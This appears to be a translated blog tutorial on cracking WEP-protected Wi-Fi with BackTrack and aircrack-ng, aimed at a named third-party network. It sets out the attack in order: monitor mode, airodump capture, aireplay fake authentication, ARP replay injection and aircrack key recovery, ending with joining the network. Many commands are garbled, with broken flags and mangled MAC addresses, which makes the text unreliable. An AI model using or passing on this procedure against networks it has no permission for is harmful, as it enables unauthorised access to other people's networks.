BackTrack - Tuto - Videos Crack Wep

Crack a WEP key!

Very good Tuto ..
Student Computer Engineer-in SUPINFO Casablanca since 2009, Specialized Technician in computer systems and networks.
One of the biggest fanatics of new technologies, and one of Moroccan Geeks!

The globalization of information and internet use, have secured a certain degree of freedom and independence, to create new concepts and new technologies that facilitate our daily lives are no longer dependent pc or cables to connect to internet and thanks to wifi.

The Wireless LAN (802.11) commonly called WiFi " Wireless Fidelity " is based on the OSI model, neglecting (more or less) the physical part because it uses radio waves instead of cables.

The wireless networks are exploding, they are installed in cafes, businesses, governments and even the neighbor and the neighborhood grocer! Some are accessible without protection (OPEN), others do not ... thus requiring a password or a hex key, implemented using protocols such protection WEP, WPA, WPA-PSK ....

Each protocol has strengths and weaknesses, and use of each protocol depends on the use and criticality of data transmitted over the network, for example: In a business, it is best to use WPA -PSK as it ensures a high level of protection than WEP, because it puts a lot of time cracking and requires the use of a dictionary.


WEP Wired Equivalent Privacy algorithm uses the stream cipher RC4 for confidentiality and the checksum CRC-32 to ensure integrity.

The 64-bit WEP uses an encryption key and a 40-bit initialization vector of 24 bits thus have a key 64-bit RC4.

128-bit version when it was, was seized as a result of 13 characters ASCII characters or 26 hexadecimal. Each pair represents 8-bit hexadecimal WEP key. 8 * 13 = 104-bit initialization vector more than 24 bits.

For 256 bits, 24 bits are reserved for the initialization vector and 232-bit encryption key. This key is usually entered as a sequence of 58 hexadecimal symbols. (58 * 4 = 232 bits) + 24 = 256 bits.

The cracking of WEP:

The cracking of WEP password first by acquiring the necessary tools and be a good distance from the access point to accelerate the process of cracking.

The main tool needed is Aircrack-Ng available in the distribution BACKTRACK 4 and in all distributions safety, but also on Windows, provided your wireless card is compatible and allows the switch to Monitor mode.

Much of drivers for wireless cards on the market have been built on BACKTRACK, but they do not guarantee all the way in monitor mode as the case of the Broadcom BCM4310 used in the demonstration.

To remedy this problem, recompiling the kernel and upgrade to version are needed.

In addition Aircrack-NG, the NG-AIRMoN which enables the monitor mode, airodump that retrieves packets and aireplay-NG q

ui can launch attacks and false authentication ARP-REQ/ACK are required (included by default in BACKTRACK.)

Ps: for owners of USB Wifi card Alfa036AH; monitoring mode automatically by running airodump.

Change "wifi0" with "wlan0" for wifi usb card Alfa036AH.

ex: airodump-ng-w-c 1-11 Lapampa wlan0

It scans the channels 1 to 11 for the French band

The BACKTRACK alone does not crack the WEP, you must also be ready on the network you want to crack, to accelerate the process of cracking,

and without forgetting that we must be patient because sometimes even if the signal is equal to 0 or more (+), the packet recovery and cracking may take longer 3min (1 hour and even more!).

PWR column indicate the signal strength of each wireless access point (network!)

The cracking:

The first step in the process of cracking is to verify whether monitor mode running on the wireless card:

A new logical interface will be created under the name mon0.

Then the command will be launched Airodump to listen on the interface mon0 and detect available wireless networks.

Once launched, it will all networks available as follows

The target of our operation will be the network "cyber_yassmina" protected by WEP.

3-It opens a new shell, and you type the following command:

airodump-ng-c (channel)-w (file name)-bssid (bssid) (interface)

In our case, the order will be as follows:

airodump-ng-c 11-w-bssid 00:18:6 yasmina E: 08:06: BF mon0

The BSSID is the MAC address of access point (wireless router).

The result is similar to the old command except that here we will only packets that traverse the network "cyber_yassmina.

4-Once the capture command executed, the shell is left open and opening another, to make a false authentication on the router, you can launch another attack and that is paramount in the crack WEP.

To make a false authentication is simple:

aireplay-ng -1 0-a (bssid)-h (mac @ striker)-e (essid) (interface)

The command will look like this:

aireplay-ng -1 0-a 00:18:6 E: 08:06: BF-h 00:11:22:33:44:55-e cyber_yasmina mon0

1: Identifying the attack "False Authentication"

0: the time between trying on failure of authentication.

-A: parameter to assign the BSSID (mac @ router)

-H parameter to assign the @ mac striker so it can be authenticated.

-E: parameter to assign the network name.

If you have ' Successful association "with the little smiley, it means that you are authenticated on the router.

After 5-counterfeit authentication, another command must be run to query and receive the ARP ARP-ACK.

aireplay-ng -3-b (bssid)-h (mac @ the attacker) (interface)

The command looks like this:

aireplay-ng -3-b 00:18:6 E: 08:06: BF-h 00:11:22:33:44:55 mon0

-3: ID ARP attack.

-B: parameter to assign the BSSID (mac @ router)

-H parameter to assign the @ mac striker so it can be authenticated.

6-We return to Shell or have been executed capture packets, you will notice that the Data column increments.

The value of this column is very important because it reflects the number of captured packets, because it usually takes 10000ARP to crack a WEP 64,

more than 40000 for a key 128 and over 100000 for a WEP 256

7-Once the required packages captured, the cracking can be done.

For this we will use the file or are captured Yasmina data Airodump USING command and will have the extension. Cap

aircrack-ng-b (bssid) (file-name 01.cap)

control necessary in our case will be:

aircrack-ng-b 00:18:6 E: 08:06: BF-yasmina 01.cap

t only remains to copy the key without a colon (:) and pasted into the password prompt when connecting to the network.


Videos ... Crack wep: Automatic method for beginners...
With : SpoonWep2   :crack_wep_auto_sans_station_spoonwep_2_backtrack_3_final/


Vidéo YouTube


Vidéo YouTube